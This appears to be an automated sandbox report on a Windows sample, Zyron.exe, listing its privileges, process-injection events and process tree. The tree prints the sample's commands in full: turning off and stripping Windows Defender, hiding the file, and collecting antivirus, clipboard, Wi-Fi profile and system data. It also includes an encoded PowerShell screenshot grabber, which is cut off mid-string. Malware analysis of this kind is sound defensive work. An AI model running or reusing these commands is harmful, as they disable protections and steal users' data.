Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4996 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 4996 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 2584 wrote to memory of 3468 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 2584 wrote to memory of 3468 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 3468 wrote to memory of 2324 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2324 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4964 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4964 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4976 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4976 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 5020 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 5020 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4344 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4344 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5020 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2324 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4976 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4964 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4344 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4344 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3468 wrote to memory of 2124 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2124 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2124 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2124 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3468 wrote to memory of 1936 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 1936 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1936 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3468 wrote to memory of 4080 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3468 wrote to memory of 4080 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4080 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4080 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3468 wrote to memory of 3848 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3848 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3848 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3848 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3468 wrote to memory of 3520 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3520 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2552 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2552 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3520 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2552 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 2256 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 2256 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 1988 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 1988 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2256 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2256 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1988 wrote to memory of 240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1988 wrote to memory of 240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3468 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3232 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3232 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3952 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3952 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3112 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 3112 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏  .scr'"

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏  .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkA